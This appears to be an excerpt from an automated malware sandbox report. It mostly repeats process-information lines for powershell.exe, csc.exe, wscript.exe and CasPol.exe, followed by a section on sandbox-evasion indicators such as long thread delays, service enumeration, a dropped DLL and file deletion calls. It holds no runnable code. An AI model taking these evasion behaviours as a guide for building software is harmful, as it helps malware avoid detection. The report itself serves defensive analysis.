                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7690Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1900Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3896Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5809Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9691Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 8.8 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep count: 7690 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3320Thread sleep count: 1900 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004Thread sleep count: 293 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004Thread sleep time: -879000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004Thread sleep count: 9691 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004Thread sleep time: -29073000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
